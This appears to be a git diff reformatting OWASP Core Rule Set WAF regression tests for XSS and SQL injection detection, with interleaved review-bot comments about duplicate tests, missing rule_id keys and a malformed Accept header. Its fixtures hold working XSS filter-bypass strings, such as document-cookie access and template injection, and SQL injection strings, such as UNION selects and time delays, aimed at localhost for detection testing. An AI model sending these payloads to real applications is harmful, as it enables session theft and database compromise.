text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml index de766fa9f..7953c58c0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml 
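Review bot: In 941370.yaml, test_id 5 ("… and string concatenation") carries exactly the same `data:` value as test_id 4, so it does not exercise what its `desc` claims and only repeats the previous test; it should either get a payload that matches its description or be dropped. Test_id 6 also reuses test_id 4's description, "Bypass using JavaScript global variables and comments in syntax", although its payload is different, so one of the two descriptions is misleading. These duplicates predate the migration but survive unchanged on the new side, and since test ids are being renumbered here this is the cheapest moment to fix them.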
@@ -2,23 +2,20 @@ meta: author: "Franziska Buehler, azurit" description: None - enabled: true - name: 941380.yaml tests: - - test_title: 941380-1 + - test_id: 1 desc: "AngularJS client side template injection detection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" - # /login?user={{constructor.constructor('alert(1)')()}} - version: HTTP/1.1 - output: - log_contains: id "941380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff" + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml index b412b7475..02e655dda 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml 
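Review bot: The `meta.name: 941380.yaml` line is dropped without a replacement `rule_id:` key, whereas the 942100.yaml and 942101.yaml hunks in this same patch add `+rule_id: 942100` and `+rule_id: 942101` directly after the `meta:` block; the 941390.yaml and 941400.yaml hunks have the same omission. If the new runner resolves the rule under test from `rule_id` rather than from the file name, these three files presumably lose their rule association silently once `name:` is gone. Adding `rule_id: 941380` (and `rule_id: 941390`, `rule_id: 941400` in the other two files) at top level after `meta:` would keep the converted files consistent with the SQLi ones.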
@@ -2,150 +2,139 @@ meta: author: "Franziska Buehler, Xhoenix, azurit" description: None - enabled: true - name: 941390.yaml tests: - - test_title: 941390-1 + - test_id: 1 desc: "JavaScript method setInterval(code, 1)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=setInterval%28code%2C%201%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=setInterval%28code%2C%201%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 2 desc: "JavaScript method: arg=x\";setTimeout(name, 1)//" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 3 desc: "JavaScript method eval('2 + 2')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=eval%28%272%20%2B%202%27%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=eval%28%272%20%2B%202%27%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 4 desc: "JavaScript constructor new Function()" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=new%20Function%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=new%20Function%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 5 desc: "JavaScript call alert" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=alert%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=alert%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 6 desc: "JavaScript call atob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=atob%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=atob%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 7 desc: "JavaScript call btoa" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=btoa%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" - - test_title: 941390-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=btoa%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 8 desc: "JavaScript call prompt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=prompt%28%29" - version: HTTP/1.1 - output: - log_contains: id 
"941390" - - test_title: 941390-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=prompt%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" + - test_id: 9 desc: "JavaScript call confirm" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=confirm%28%29" - version: HTTP/1.1 - output: - log_contains: id "941390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=confirm%28%29" + version: HTTP/1.1 + output: + log_contains: id "941390" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml index ddecdfe8e..6650ffb2b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml 
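Review bot: The `Accept` header for `test_id: 8` and `test_id: 9` ends in `*/*;q=0.>` instead of `*/*;q=0.5`, a typo the conversion carries onto the new lines while every other test in this file and its siblings uses `q=0.5`. The header is only request fixture data, so the rule match on `id "941390"` is unaffected, but the malformed quality value could be rejected by a stricter backend and it breaks the otherwise uniform fixtures. Replace both lines with `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"`.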
@@ -2,118 +2,109 @@ meta: author: "Andrea Menin, azurit" description: None - enabled: true - name: 941400.yaml tests: - - test_title: 941400-1 + - test_id: 1 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.sort.call%60%24%7Balert%7D1337%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 2 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 3 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 4 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 5 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb90117..7a8b5e8ca 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml 
@@ -2,244 +2,229 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 526=527" + 
version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - 